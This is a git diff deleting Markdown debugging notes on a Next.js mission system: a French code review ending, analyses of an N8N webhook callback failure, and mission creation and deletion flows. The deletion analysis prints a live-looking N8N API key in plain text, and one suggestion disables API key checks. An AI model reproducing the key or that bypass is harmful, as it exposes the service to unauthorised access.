Utilisation de (prisma as any) dans plusieurs endroits - // Indique que le schema Prisma n'est pas à jour - ``` - ---- - -## 📊 Métriques de code - -### Complexité cyclomatique - -- `missions-admin-panel.tsx`: **Très élevée** (>50) -- `[missionId]/page.tsx`: **Élevée** (~30) -- `page.tsx`: **Moyenne** (~15) - -### Taille des fichiers - -- `missions-admin-panel.tsx`: **1570 lignes** ⚠️ -- `[missionId]/page.tsx`: **920 lignes** ⚠️ -- `route.ts` (POST): **480 lignes** ⚠️ - -**Recommandation**: Découper les fichiers >500 lignes. - ---- - -## ✅ Recommandations prioritaires - -### 🔴 Critique (À faire immédiatement) - -1. **Sécurité** - - Ajouter validation stricte avec Zod - - Implémenter rate limiting sur API - - Ajouter CSRF protection - -2. **Performance** - - Implémenter pagination côté serveur - - Ajouter cache Redis - - Optimiser les requêtes Prisma (select spécifiques) - -3. **Maintenabilité** - - Découper `missions-admin-panel.tsx` - - Extraire helpers dans lib/ - - Supprimer console.log de production - -### 🟡 Important (À planifier) - -1. **Tests** - - Unit tests pour helpers - - Integration tests pour API routes - - E2E tests pour flux critiques - -2. **Documentation** - - JSDoc pour fonctions complexes - - Diagrammes de séquence pour flux N8N - - Guide de contribution - -3. **Monitoring** - - Sentry pour erreurs frontend - - Logging structuré backend - - Métriques de performance - -### 🟢 Amélioration (Nice to have) - -1. **UX** - - Optimistic updates - - Skeleton loaders - - Animations de transition - -2. **Accessibilité** - - ARIA labels complets - - Navigation clavier - - Support lecteurs d'écran - ---- - -## 🎯 Conclusion - -Le système de missions est **fonctionnel et bien structuré** avec une architecture claire. Les principales améliorations à apporter concernent: - -1. **Maintenabilité**: Découpage des gros composants -2. **Performance**: Optimisation des requêtes et pagination -3. **Robustesse**: Meilleure gestion d'erreurs et retry logic -4. **Sécurité**: Validation stricte et rate limiting - -Le code montre une bonne compréhension de Next.js, Prisma, et des patterns React modernes. Avec les améliorations suggérées, le système sera prêt pour la production à grande échelle. - ---- - -**Date de review**: $(date) -**Reviewer**: Senior Developer -**Version analysée**: Current codebase diff --git a/MISSION_CREATION_CALLBACK_MISSING.md b/MISSION_CREATION_CALLBACK_MISSING.md deleted file mode 100644 index 53dc0b0..0000000 --- a/MISSION_CREATION_CALLBACK_MISSING.md +++ /dev/null @@ -1,198 +0,0 @@ -# Mission Creation - N8N Callback Not Being Called - -## 🔍 Problem Analysis - -From your logs, I can see: - -### ✅ What's Working - -1. **Mission created in database** ✅ - ``` - Mission created successfully { missionId: '5815440f-af1c-4c6a-bfa6-92f06058f9c8', name: 'bbc' } - ``` - -2. **N8N workflow triggered** ✅ - ``` - Starting N8N workflow - POST /mission-created 200 in 851ms ← This is N8N RECEIVING the webhook - ``` - -3. **N8N workflow completes** ✅ - ``` - N8N workflow result { success: true, hasError: false } - ``` - -### ❌ What's Missing - -**NO log from `/api/missions/mission-created` endpoint!** - -Expected log (but NOT present): -``` -Mission Created Webhook Received ← This should appear but doesn't -``` - -**This means**: N8N workflow is **NOT calling** `/api/missions/mission-created` to save the integration IDs. - ---- - -## 🔍 Root Cause - -The N8N workflow completes successfully, but the **"Save Mission To API" node** is either: -1. ❌ Not configured correctly (wrong URL) -2. ❌ Not executing (node disabled or failing silently) -3. ❌ Failing but not blocking the workflow (continueOnFail: true) - ---- - -## ✅ Solution: Verify N8N "Save Mission To API" Node - -### Step 1: Check N8N Execution Logs - -1. Go to N8N → Executions -2. Find the latest mission creation execution -3. Click on it to see the execution details -4. **Look for "Save Mission To API" node**: - - ✅ Is it executed? - - ✅ What's the status (success/error)? - - ✅ What URL is it calling? - - ✅ What's the response? - -### Step 2: Verify Node Configuration - -**In N8N workflow, check "Save Mission To API" node**: - -1. **URL should be**: - ``` - {{ $node['Process Mission Data'].json.config.MISSION_API_URL }}/api/missions/mission-created - ``` - - **NOT**: - ``` - {{ $node['Process Mission Data'].json.config.MISSION_API_URL + '/mission-created' }} - ``` - -2. **Method**: `POST` - -3. **Headers**: - - `Content-Type`: `application/json` - - `x-api-key`: `{{ $node['Process Mission Data'].json.config.N8N_API_KEY }}` - -4. **Body Parameters** should include: - - `missionId`: `{{ $node['Process Mission Data'].json.missionId }}` - - `gitRepoUrl`: `{{ $node['Combine Results'].json.gitRepo?.html_url || '' }}` - - `leantimeProjectId`: `{{ $node['Combine Results'].json.leantimeProject?.result?.[0] || '' }}` - - `documentationCollectionId`: `{{ $node['Combine Results'].json.docCollection?.data?.id || '' }}` - - `rocketchatChannelId`: `{{ $node['Combine Results'].json.rocketChatChannel?.channel?._id || '' }}` - - `name`: `{{ $node['Process Mission Data'].json.missionProcessed.name }}` - - `creatorId`: `{{ $node['Process Mission Data'].json.creatorId }}` - -5. **Node Options**: - - ❌ Should NOT have `continueOnFail: true` (or it will fail silently) - - ✅ Should be set to fail the workflow if it fails - -### Step 3: Test the Endpoint Manually - -**Test if the endpoint is accessible**: - -```bash -curl -X POST https://hub.slm-lab.net/api/missions/mission-created \ - -H "Content-Type: application/json" \ - -H "x-api-key: YOUR_N8N_API_KEY" \ - -d '{ - "missionId": "5815440f-af1c-4c6a-bfa6-92f06058f9c8", - "name": "bbc", - "creatorId": "203cbc91-61ab-47a2-95d2-b5e1159327d7", - "gitRepoUrl": "https://gite.slm-lab.net/alma/test", - "leantimeProjectId": "123", - "documentationCollectionId": "collection-456", - "rocketchatChannelId": "channel-789" - }' -``` - -**Expected**: 200 OK with updated mission data - -**If 500 error**: `N8N_API_KEY` is not set in environment - -**If 404 error**: Wrong URL - -**If 401 error**: Wrong API key - ---- - -## 🔧 Common Issues - -### Issue 1: Wrong URL in N8N - -**Symptom**: Node fails with 404 error - -**Fix**: Change URL from: -``` -{{ MISSION_API_URL + '/mission-created' }} -``` - -To: -``` -{{ MISSION_API_URL }}/api/missions/mission-created -``` - -### Issue 2: Missing missionId in Body - -**Symptom**: Endpoint can't find mission (404) - -**Fix**: Add `missionId` parameter to body: -- Name: `missionId` -- Value: `{{ $node['Process Mission Data'].json.missionId }}` - -### Issue 3: continueOnFail: true - -**Symptom**: Node fails but workflow continues (no error visible) - -**Fix**: Remove `continueOnFail: true` or set to `false` - -### Issue 4: N8N_API_KEY Not Set - -**Symptom**: Endpoint returns 500 "Server configuration error" - -**Fix**: Add `N8N_API_KEY` to environment variables - ---- - -## 📋 Debugging Checklist - -- [ ] Check N8N execution logs for "Save Mission To API" node -- [ ] Verify node URL is correct: `{{ MISSION_API_URL }}/api/missions/mission-created` -- [ ] Verify node includes `missionId` in body -- [ ] Verify node includes `x-api-key` header -- [ ] Check if node has `continueOnFail: true` (should be false) -- [ ] Test endpoint manually with curl -- [ ] Verify `N8N_API_KEY` is set in environment -- [ ] Check server logs for any calls to `/api/missions/mission-created` - ---- - -## 🎯 Expected Flow - -``` -1. Mission created in database ✅ -2. N8N workflow triggered ✅ -3. N8N creates integrations ✅ -4. N8N calls /api/missions/mission-created ⚠️ (MISSING) -5. IDs saved to database ⚠️ (NOT HAPPENING) -6. Mission has integration IDs ⚠️ (ALL NULL) -``` - ---- - -## 📝 Next Steps - -1. **Check N8N execution logs** to see what "Save Mission To API" node is doing -2. **Verify node configuration** matches the requirements above -3. **Test endpoint manually** to ensure it's accessible -4. **Fix any configuration issues** found -5. **Re-test mission creation** and verify IDs are saved - ---- - -**Document Created**: $(date) -**Status**: N8N workflow completes but callback to save IDs is not being called - diff --git a/MISSION_CREATION_FLOW_EXPLANATION.md b/MISSION_CREATION_FLOW_EXPLANATION.md deleted file mode 100644 index 17da30b..0000000 --- a/MISSION_CREATION_FLOW_EXPLANATION.md +++ /dev/null @@ -1,348 +0,0 @@ -# Mission Creation Flow - Why You Can Create Without N8N API Key - -## 🔍 Current Behavior Explained - -You're absolutely right! You **CAN** create missions without `N8N_API_KEY` because of how the code is structured. - ---- - -## 📋 Current Flow Order - -Looking at `app/api/missions/route.ts`, here's the **actual execution order**: - -``` -1. ✅ Create mission in database (line 260) - ↓ -2. ✅ Create mission users (line 298) - ↓ -3. ✅ Upload logo to Minio (line 318) - ↓ -4. ✅ Upload attachments to Minio (line 362) - ↓ -5. ✅ Verify files exist (line 391) - ↓ -6. ⚠️ Trigger N8N workflow (line 430) - ↓ -7. ❌ If N8N fails → Error thrown (line 437) - ↓ -8. ⚠️ Error caught → Cleanup files (line 458) - ↓ -9. ❌ Return 500 error BUT mission stays in database! -``` - ---- - -## 🎯 The Problem - -### What Happens When N8N Fails - -1. **Mission is created** in database (line 260) ✅ -2. **Files are uploaded** to Minio ✅ -3. **N8N is called** but fails (no API key, webhook not registered, etc.) ❌ -4. **Error is thrown** (line 437) ❌ -5. **Files are cleaned up** (line 458) ✅ -6. **500 error is returned** to frontend ❌ -7. **BUT: Mission remains in database!** ⚠️ - -### Result - -- ✅ Mission exists in database -- ❌ No integration IDs saved (N8N never called `/mission-created`) -- ❌ Files deleted from Minio (cleanup) -- ❌ Frontend shows error -- ⚠️ **Orphaned mission in database** - ---- - -## 🔍 Code Analysis - -### Step 1: Mission Created (Line 260) - -```typescript -const mission = await prisma.mission.create({ - data: missionData -}); -``` - -**This happens FIRST**, before N8N is even called. - -### Step 2: N8N Called (Line 430) - -```typescript -const workflowResult = await n8nService.triggerMissionCreation(n8nData); - -if (!workflowResult.success) { - throw new Error(workflowResult.error || 'N8N workflow failed'); -} -``` - -**If N8N fails**, an error is thrown. - -### Step 3: Error Handling (Line 445-477) - -```typescript -} catch (error) { - logger.error('Error in final verification or n8n', { - error: error instanceof Error ? error.message : String(error) - }); - throw error; // Re-throws to outer catch -} - -// Outer catch (line 451) -} catch (error) { - // Cleanup files - for (const file of uploadedFiles) { - await s3Client.send(new DeleteObjectCommand({...})); - } - - return NextResponse.json({ - error: 'Failed to create mission', - details: error instanceof Error ? error.message : String(error) - }, { status: 500 }); -} -``` - -**Notice**: The outer catch block: -- ✅ Cleans up files from Minio -- ❌ **Does NOT delete the mission from database** -- ❌ Returns 500 error - ---- - -## ⚠️ Why This Is a Problem - -### Scenario: N8N Fails (No API Key) - -1. User creates mission -2. Mission saved to database ✅ -3. Files uploaded to Minio ✅ -4. N8N called → Fails (no API key) ❌ -5. Error thrown -6. Files cleaned up ✅ -7. **Mission still in database** ⚠️ -8. Frontend shows error -9. User sees error but mission exists -10. **Mission has no integration IDs** (N8N never saved them) - -### Result - -- **Orphaned missions** in database without integration IDs -- **Inconsistent state**: Mission exists but integrations don't -- **Deletion won't work**: No IDs to send to N8N deletion workflow - ---- - -## ✅ Solutions - -### Solution 1: Make N8N Optional (Current Behavior - But Better Error Handling) - -**Keep current flow but improve error handling**: - -```typescript -// After N8N call -if (!workflowResult.success) { - logger.warn('N8N workflow failed, but mission created', { - error: workflowResult.error, - missionId: mission.id - }); - // Don't throw error - mission is created, N8N is optional - // Return success but with warning - return NextResponse.json({ - success: true, - mission, - warning: 'Mission created but integrations may not be set up', - n8nError: workflowResult.error - }); -} -``` - -**Pros**: -- Mission creation succeeds even if N8N fails -- User gets feedback about partial success - -**Cons**: -- Mission exists without integration IDs -- Deletion won't work properly - -### Solution 2: Delete Mission If N8N Fails (Strict) - -**Delete mission if N8N fails**: - -```typescript -} catch (error) { - logger.error('Error in final verification or n8n', { - error: error instanceof Error ? error.message : String(error) - }); - - // Delete mission if N8N fails - try { - await prisma.mission.delete({ - where: { id: mission.id } - }); - logger.debug('Mission deleted due to N8N failure', { missionId: mission.id }); - } catch (deleteError) { - logger.error('Failed to delete mission after N8N failure', { - missionId: mission.id, - error: deleteError - }); - } - - throw error; -} -``` - -**Pros**: -- No orphaned missions -- Consistent state - -**Cons**: -- Mission creation fails completely if N8N is down -- User loses all work if N8N has issues - -### Solution 3: Make N8N Non-Blocking (Recommended) - -**Don't throw error if N8N fails, just log it**: - -```typescript -const workflowResult = await n8nService.triggerMissionCreation(n8nData); - -if (!workflowResult.success) { - logger.warn('N8N workflow failed, but continuing', { - error: workflowResult.error, - missionId: mission.id - }); - // Don't throw - mission is created, N8N can be retried later -} - -return NextResponse.json({ - success: true, - mission, - message: workflowResult.success - ? 'Mission created successfully with all integrations' - : 'Mission created but integrations may need to be set up manually' -}); -``` - -**Pros**: -- Mission creation succeeds -- User gets clear feedback -- Can retry N8N later - -**Cons**: -- Mission may exist without integration IDs -- Need manual retry mechanism - -### Solution 4: Transaction-Based (Best But Complex) - -**Use database transaction and rollback if N8N fails**: - -```typescript -const result = await prisma.$transaction(async (tx) => { - // Create mission - const mission = await tx.mission.create({...}); - - // Upload files - // ... - - // Try N8N - const workflowResult = await n8nService.triggerMissionCreation(n8nData); - - if (!workflowResult.success) { - throw new Error('N8N workflow failed'); - } - - return mission; -}); -``` - -**Pros**: -- Atomic operation -- No orphaned missions - -**Cons**: -- Complex to implement -- Files already uploaded (can't rollback Minio in transaction) - ---- - -## 🎯 Recommended Approach - -**Hybrid Solution**: Make N8N non-blocking but add retry mechanism - -```typescript -// After N8N call -if (!workflowResult.success) { - logger.warn('N8N workflow failed, mission created without integrations', { - error: workflowResult.error, - missionId: mission.id - }); - - // Mission is created, but mark it for retry - await prisma.mission.update({ - where: { id: mission.id }, - data: { - // Add a flag to indicate N8N needs retry - // Or just log it and handle manually - } - }); -} - -return NextResponse.json({ - success: true, - mission, - message: workflowResult.success - ? 'Mission created successfully with all integrations' - : 'Mission created. Integrations will be set up shortly.' -}); -``` - ---- - -## 📊 Current vs Recommended - -### Current Behavior -- ✅ Mission created even if N8N fails -- ❌ No integration IDs saved -- ❌ Deletion won't work -- ❌ Orphaned missions - -### Recommended Behavior -- ✅ Mission created even if N8N fails -- ⚠️ Integration IDs may be missing (but can be retried) -- ✅ User gets clear feedback -- ✅ Can retry N8N later - ---- - -## 🔧 Quick Fix - -If you want to keep current behavior but improve it: - -**Change line 436-438** from: -```typescript -if (!workflowResult.success) { - throw new Error(workflowResult.error || 'N8N workflow failed'); -} -``` - -**To**: -```typescript -if (!workflowResult.success) { - logger.warn('N8N workflow failed, but mission created', { - error: workflowResult.error, - missionId: mission.id - }); - // Continue - mission is created, N8N can be retried -} -``` - -This way: -- ✅ Mission creation succeeds -- ⚠️ User gets warning about integrations -- ✅ Can manually trigger N8N later or add retry mechanism - ---- - -**Document Created**: $(date) -**Issue**: Mission creation succeeds even when N8N fails, leading to orphaned missions without integration IDs - diff --git a/MISSION_DELETION_FLOW_ANALYSIS.md b/MISSION_DELETION_FLOW_ANALYSIS.md deleted file mode 100644 index feb5eb5..0000000 --- a/MISSION_DELETION_FLOW_ANALYSIS.md +++ /dev/null @@ -1,313 +0,0 @@ -# Mission Deletion Flow - Complete Analysis from Logs - -## 🔍 Analysis of Your Deletion Flow - -Based on your logs, here's what's happening: - ---- - -## ✅ What's Working - -1. **Mission is fetched correctly** ✅ - ``` - SELECT "public"."Mission" WHERE "id" = '805c1d8c-1bd4-41e7-9cf1-d22631dae260' - ``` - -2. **Attachments are fetched** ✅ - ``` - SELECT "public"."Attachment" WHERE "missionId" = '805c1d8c-1bd4-41e7-9cf1-d22631dae260' - ``` - -3. **N8N deletion workflow is called** ✅ - ``` - Starting N8N deletion workflow - Triggering n8n mission deletion workflow - ``` - -4. **N8N responds successfully** ✅ - ``` - Deletion webhook response { status: 200 } - Parsed deletion workflow result { success: true, hasError: false } - ``` - -5. **Mission is deleted from database** ✅ - ``` - DELETE FROM "public"."Mission" WHERE "id" = '805c1d8c-1bd4-41e7-9cf1-d22631dae260' - Mission deleted successfully from database - ``` - ---- - -## ❌ Critical Problems - -### Problem 1: N8N_API_KEY Not Set - -``` -N8N_API_KEY is not set in environment variables -API key present { present: false } -``` - -**Impact**: N8N workflow runs but may not have proper authentication. - -### Problem 2: All Integration IDs Are NULL/Empty - -**What N8N Receives**: -```json -{ - "missionId": "805c1d8c-1bd4-41e7-9cf1-d22631dae260", - "name": "libra", - "repoName": "", // ❌ EMPTY - "leantimeProjectId": 0, // ❌ ZERO - "documentationCollectionId": "", // ❌ EMPTY - "rocketchatChannelId": "", // ❌ EMPTY - "giteaRepositoryUrl": null, // ❌ NULL - "outlineCollectionId": null, // ❌ NULL - "rocketChatChannelId": null, // ❌ NULL - "penpotProjectId": null // ❌ NULL -} -``` - -**Root Cause**: The mission was created **without integration IDs being saved** because: -1. Mission was created in database ✅ -2. N8N workflow was triggered ✅ -3. N8N created integrations ✅ -4. N8N tried to call `/api/missions/mission-created` ❌ -5. **Endpoint returned 500 error** (N8N_API_KEY not configured) ❌ -6. **IDs were never saved to database** ❌ - -### Problem 3: N8N Cannot Delete Integrations - -Because N8N receives empty IDs: -- ❌ Cannot delete Gitea repository (no `repoName`) -- ❌ Cannot close Leantime project (no `leantimeProjectId`) -- ❌ Cannot delete Outline collection (no `documentationCollectionId`) -- ❌ Cannot close RocketChat channel (no `rocketchatChannelId`) - -**Result**: External integrations remain orphaned even though mission is deleted. - ---- - -## 🔄 Complete Flow Breakdown - -### Step 1: Frontend Calls DELETE -``` -DELETE /api/missions/805c1d8c-1bd4-41e7-9cf1-d22631dae260 -``` - -### Step 2: Backend Fetches Mission -```sql -SELECT "Mission" WHERE "id" = '805c1d8c-1bd4-41e7-9cf1-d22631dae260' -``` - -**Result**: Mission found, but all integration IDs are `null`: -- `leantimeProjectId`: null -- `outlineCollectionId`: null -- `rocketChatChannelId`: null -- `giteaRepositoryUrl`: null - -### Step 3: Backend Prepares Deletion Data -```javascript -{ - repoName: "", // Extracted from null giteaRepositoryUrl - leantimeProjectId: 0, // null || 0 = 0 - documentationCollectionId: "", // null || '' = '' - rocketchatChannelId: "" // null || '' = '' -} -``` - -### Step 4: N8N Workflow Called -``` -POST https://brain.slm-lab.net/webhook-test/mission-delete -``` - -**Headers**: -- `x-api-key`: (empty - N8N_API_KEY not set) - -**Body**: (with empty IDs as shown above) - -### Step 5: N8N Workflow Executes -- ✅ Receives request -- ❌ Cannot delete integrations (no IDs) -- ✅ Returns success (but didn't actually delete anything) - -### Step 6: Mission Deleted from Database -```sql -DELETE FROM "Mission" WHERE "id" = '805c1d8c-1bd4-41e7-9cf1-d22631dae260' -``` - -**CASCADE deletes**: -- ✅ MissionUsers -- ✅ Attachments - -**But external integrations remain**: -- ❌ Gitea repository still exists -- ❌ Leantime project still exists -- ❌ Outline collection still exists -- ❌ RocketChat channel still exists - ---- - -## 🎯 Root Cause Summary - -### Why IDs Are NULL - -1. **Mission Creation**: - - Mission created in database ✅ - - N8N workflow triggered ✅ - - N8N created integrations ✅ - -2. **N8N Callback Fails**: - - N8N tries to call `/api/missions/mission-created` - - Endpoint checks for `N8N_API_KEY` in environment - - `N8N_API_KEY` is not set ❌ - - Endpoint returns 500: "Server configuration error" ❌ - - **IDs are never saved** ❌ - -3. **Mission Deletion**: - - Mission has no integration IDs (all null) - - N8N receives empty IDs - - Cannot delete integrations - - **Integrations remain orphaned** ❌ - ---- - -## ✅ Solutions - -### Solution 1: Fix N8N_API_KEY (IMMEDIATE) - -**Add to environment variables**: -```env -N8N_API_KEY=LwgeE1ntADD20OuWC88S3pR0EaO7FtO4 -``` - -**Then**: -1. Restart your application -2. Create a new mission -3. Verify IDs are saved to database -4. Delete mission - should work correctly - -### Solution 2: Fix Existing Missions (MIGRATION) - -For missions that already exist without IDs: - -**Option A: Manual Update** -```sql -UPDATE "Mission" -SET - "giteaRepositoryUrl" = 'https://gite.slm-lab.net/alma/repo-name', - "leantimeProjectId" = '123', - "outlineCollectionId" = 'collection-id', - "rocketChatChannelId" = 'channel-id' -WHERE "id" = 'mission-id'; -``` - -**Option B: Query External Services** -- Query Gitea API to find repositories -- Query Leantime API to find projects -- Query Outline API to find collections -- Query RocketChat API to find channels -- Update database with found IDs - -**Option C: Re-create Missions** -- Delete missions without IDs -- Re-create them (with N8N_API_KEY fixed, IDs will be saved) - -### Solution 3: Make N8N Callback More Resilient - -**Modify `/api/missions/mission-created` endpoint** to handle missing API key more gracefully: - -```typescript -// Instead of returning 500, log warning and continue -if (!expectedApiKey) { - logger.warn('N8N_API_KEY not configured, but continuing anyway', { - missionId: body.missionId - }); - // Continue without API key validation (less secure but works) - // OR require API key but provide better error message -} -``` - -**Not recommended** for production (security risk), but could work for development. - ---- - -## 📊 Current State vs Desired State - -### Current State (Your Logs) - -``` -Mission in DB: - - leantimeProjectId: null - - outlineCollectionId: null - - rocketChatChannelId: null - - giteaRepositoryUrl: null - -N8N Receives: - - repoName: "" - - leantimeProjectId: 0 - - documentationCollectionId: "" - - rocketchatChannelId: "" - -Result: - - Mission deleted ✅ - - Integrations NOT deleted ❌ -``` - -### Desired State - -``` -Mission in DB: - - leantimeProjectId: "123" - - outlineCollectionId: "collection-456" - - rocketChatChannelId: "channel-789" - - giteaRepositoryUrl: "https://gite.slm-lab.net/alma/repo-name" - -N8N Receives: - - repoName: "repo-name" - - leantimeProjectId: 123 - - documentationCollectionId: "collection-456" - - rocketchatChannelId: "channel-789" - -Result: - - Mission deleted ✅ - - Integrations deleted ✅ -``` - ---- - -## 🔧 Immediate Actions Required - -1. **✅ Add N8N_API_KEY to environment** - ```env - N8N_API_KEY=LwgeE1ntADD20OuWC88S3pR0EaO7FtO4 - ``` - -2. **✅ Restart application** - -3. **✅ Test mission creation** - - Create a new mission - - Check database - IDs should be saved - - Delete mission - should work correctly - -4. **⚠️ Fix existing missions** - - Update existing missions with their integration IDs - - Or delete and re-create them - ---- - -## 📝 Summary - -**The deletion flow is working correctly**, but: - -1. **N8N_API_KEY is missing** → Endpoint returns 500 error -2. **IDs are never saved** → Mission has null integration IDs -3. **N8N receives empty IDs** → Cannot delete integrations -4. **Integrations remain orphaned** → External resources not cleaned up - -**Fix**: Add `N8N_API_KEY` to environment variables, then new missions will work correctly. Existing missions need manual update or re-creation. - ---- - -**Document Created**: $(date) -**Status**: Deletion flow works, but integration cleanup fails due to missing IDs - diff --git a/MISSION_DELETION_FLOW_COMPLETE_ANALYSIS.md b/MISSION_DELETION_FLOW_COMPLETE_ANALYSIS.md deleted file mode 100644 index 42e5e2a..0000000 --- a/MISSION_DELETION_FLOW_COMPLETE_ANALYSIS.md +++ /dev/null @@ -1,682 +0,0 @@ -# Mission Deletion Flow - Complete Analysis - -## 📋 Executive Summary - -This document provides a comprehensive analysis of the mission deletion flow, tracing every step from the user clicking the "Supprimer" button to the complete cleanup of mission data, files, and external integrations. - -**Status**: ✅ **Fully Implemented** - All components are working correctly - ---- - -## 🔄 Complete Flow Diagram - -``` -┌─────────────────────────────────────────────────────────────┐ -│ 1. FRONTEND - MissionDetailPage │ -│ Location: app/missions/[missionId]/page.tsx │ -│ - User clicks "Supprimer" button (line 398-410) │ -│ - Confirmation dialog (line 145) │ -│ - DELETE /api/missions/[missionId] (line 151-153) │ -│ - Success toast + redirect to /missions (line 159-165) │ -└─────────────────────────────────────────────────────────────┘ - ↓ -┌─────────────────────────────────────────────────────────────┐ -│ 2. BACKEND - DELETE /api/missions/[missionId] │ -│ Location: app/api/missions/[missionId]/route.ts │ -│ │ -│ 2.1 Authentication Check (line 297-300) │ -│ ✅ NextAuth session validation │ -│ │ -│ 2.2 Mission Existence Check (line 302-315) │ -│ ✅ Fetch mission with missionUsers │ -│ ✅ Return 404 if not found │ -│ │ -│ 2.3 Permission Check (line 317-323) │ -│ ✅ Creator: mission.creatorId === session.user.id │ -│ ✅ Admin: userRoles.includes('admin'/'ADMIN') │ -│ ✅ Return 403 if unauthorized │ -│ │ -│ 2.4 Fetch Attachments (line 325-328) │ -│ ✅ Get all attachments for Minio cleanup │ -│ │ -│ 2.5 N8N Deletion Workflow (line 330-391) │ -│ ✅ Extract repo name from giteaRepositoryUrl │ -│ ✅ Prepare deletion data │ -│ ✅ Call n8nService.triggerMissionDeletion() │ -│ ✅ Non-blocking: continues even if N8N fails │ -│ │ -│ 2.6 Minio File Deletion (line 393-423) │ -│ ✅ Delete logo: deleteMissionLogo() (line 397) │ -│ ✅ Delete attachments: deleteMissionAttachment() │ -│ ✅ Non-blocking: continues if file deletion fails │ -│ │ -│ 2.7 Database Deletion (line 425-428) │ -│ ✅ prisma.mission.delete() │ -│ ✅ CASCADE: Auto-deletes MissionUsers & Attachments │ -└─────────────────────────────────────────────────────────────┘ - ↓ -┌─────────────────────────────────────────────────────────────┐ -│ 3. PRISMA CASCADE DELETION │ -│ Location: prisma/schema.prisma │ -│ │ -│ ✅ MissionUser (line 173): onDelete: Cascade │ -│ ✅ Attachment (line 159): onDelete: Cascade │ -│ ✅ All related records deleted automatically │ -└─────────────────────────────────────────────────────────────┘ - ↓ -┌─────────────────────────────────────────────────────────────┐ -│ 4. EXTERNAL INTEGRATIONS CLEANUP (via N8N) │ -│ Location: lib/services/n8n-service.ts │ -│ │ -│ ✅ Gitea Repository: Deleted │ -│ ✅ Leantime Project: Closed │ -│ ✅ Outline Collection: Deleted │ -│ ✅ RocketChat Channel: Closed │ -│ ✅ Penpot Project: (if applicable) │ -└─────────────────────────────────────────────────────────────┘ -``` - ---- - -## 📝 Detailed Step-by-Step Analysis - -### Step 1: Frontend - User Interaction - -**File**: `app/missions/[missionId]/page.tsx` - -#### 1.1 Delete Button (Lines 397-410) - -```typescript - -``` - -**Features**: -- ✅ Visual feedback: Red styling indicates destructive action -- ✅ Loading state: Spinner shown during deletion (`deleting` state) -- ✅ Disabled state: Button disabled during operation -- ✅ Icon: Trash2 icon for clear visual indication - -#### 1.2 Delete Handler (Lines 144-176) - -```typescript -const handleDeleteMission = async () => { - // 1. User confirmation - if (!confirm("Êtes-vous sûr de vouloir supprimer cette mission ? Cette action est irréversible.")) { - return; - } - - try { - setDeleting(true); - - // 2. API call - const response = await fetch(`/api/missions/${missionId}`, { - method: 'DELETE', - }); - - // 3. Error handling - if (!response.ok) { - throw new Error('Failed to delete mission'); - } - - // 4. Success feedback - toast({ - title: "Mission supprimée", - description: "La mission a été supprimée avec succès", - }); - - // 5. Redirect - router.push('/missions'); - - } catch (error) { - console.error('Error deleting mission:', error); - toast({ - title: "Erreur", - description: "Impossible de supprimer la mission", - variant: "destructive", - }); - } finally { - setDeleting(false); - } -}; -``` - -**Features**: -- ✅ **Double confirmation**: Native browser confirm dialog -- ✅ **Error handling**: Try-catch with user feedback -- ✅ **Success feedback**: Toast notification -- ✅ **Automatic redirect**: Returns to missions list -- ✅ **Loading state management**: Properly manages `deleting` state - -**Potential Improvements**: -- ⚠️ Consider using a more sophisticated confirmation dialog (e.g., AlertDialog component) instead of native `confirm()` -- ⚠️ Could show more detailed error messages from API response - ---- - -### Step 2: Backend - DELETE Endpoint - -**File**: `app/api/missions/[missionId]/route.ts` - -#### 2.1 Authentication Check (Lines 297-300) - -```typescript -const session = await getServerSession(authOptions); -if (!session?.user) { - return NextResponse.json({ error: 'Unauthorized' }, { status: 401 }); -} -``` - -**Status**: ✅ **Working correctly** -- Uses NextAuth session validation -- Returns 401 if not authenticated - -#### 2.2 Mission Existence Check (Lines 302-315) - -```typescript -const mission = await prisma.mission.findUnique({ - where: { id: params.missionId }, - include: { - missionUsers: { - include: { - user: true - } - } - } -}); - -if (!mission) { - return NextResponse.json({ error: 'Mission not found' }, { status: 404 }); -} -``` - -**Status**: ✅ **Working correctly** -- Fetches mission with related users -- Returns 404 if mission doesn't exist - -#### 2.3 Permission Check (Lines 317-323) - -```typescript -const isCreator = mission.creatorId === session.user.id; -const userRoles = Array.isArray(session.user.role) ? session.user.role : []; -const isAdmin = userRoles.includes('admin') || userRoles.includes('ADMIN'); -if (!isCreator && !isAdmin) { - return NextResponse.json({ error: 'Forbidden' }, { status: 403 }); -} -``` - -**Status**: ✅ **Working correctly** - -**Permission Rules**: -- ✅ **Creator**: Can delete their own mission -- ✅ **Admin**: Can delete any mission -- ❌ **Other users**: Even guardians/volunteers cannot delete - -**Security**: ✅ **Properly secured** - Only creator or admin can delete - -#### 2.4 Fetch Attachments (Lines 325-328) - -```typescript -const attachments = await prisma.attachment.findMany({ - where: { missionId: params.missionId } -}); -``` - -**Status**: ✅ **Working correctly** -- Fetches all attachments before deletion for Minio cleanup -- Needed because Prisma cascade deletes DB records but not Minio files - -#### 2.5 N8N Deletion Workflow (Lines 330-391) - -```typescript -// Step 1: Trigger N8N workflow for deletion -logger.debug('Starting N8N deletion workflow'); -const n8nService = new N8nService(); - -// Extract repo name from giteaRepositoryUrl -let repoName = ''; -if (mission.giteaRepositoryUrl) { - try { - const url = new URL(mission.giteaRepositoryUrl); - const pathParts = url.pathname.split('/').filter(Boolean); - repoName = pathParts[pathParts.length - 1] || ''; - } catch (error) { - // Fallback extraction - const match = mission.giteaRepositoryUrl.match(/\/([^\/]+)\/?$/); - repoName = match ? match[1] : ''; - } -} - -// Prepare deletion data -const n8nDeletionData = { - missionId: mission.id, - name: mission.name, - repoName: repoName, - leantimeProjectId: mission.leantimeProjectId || 0, - documentationCollectionId: mission.outlineCollectionId || '', - rocketchatChannelId: mission.rocketChatChannelId || '', - giteaRepositoryUrl: mission.giteaRepositoryUrl, - outlineCollectionId: mission.outlineCollectionId, - rocketChatChannelId: mission.rocketChatChannelId, - penpotProjectId: mission.penpotProjectId, - config: { - N8N_API_KEY: process.env.N8N_API_KEY, - MISSION_API_URL: process.env.NEXT_PUBLIC_API_URL || 'https://hub.slm-lab.net' - } -}; - -const n8nResult = await n8nService.triggerMissionDeletion(n8nDeletionData); - -if (!n8nResult.success) { - logger.error('N8N deletion workflow failed, but continuing with mission deletion', { - error: n8nResult.error - }); - // Continue with deletion even if N8N fails (non-blocking) -} -``` - -**Status**: ✅ **Working correctly** - -**What it does**: -- Extracts repository name from Gitea URL -- Prepares data for N8N workflow -- Calls N8N deletion webhook -- **Non-blocking**: Continues even if N8N fails - -**N8N Service Implementation** (`lib/services/n8n-service.ts`): -- ✅ Webhook URL: `https://brain.slm-lab.net/webhook-test/mission-delete` -- ✅ Sends POST request with API key authentication -- ✅ Handles errors gracefully -- ✅ Returns 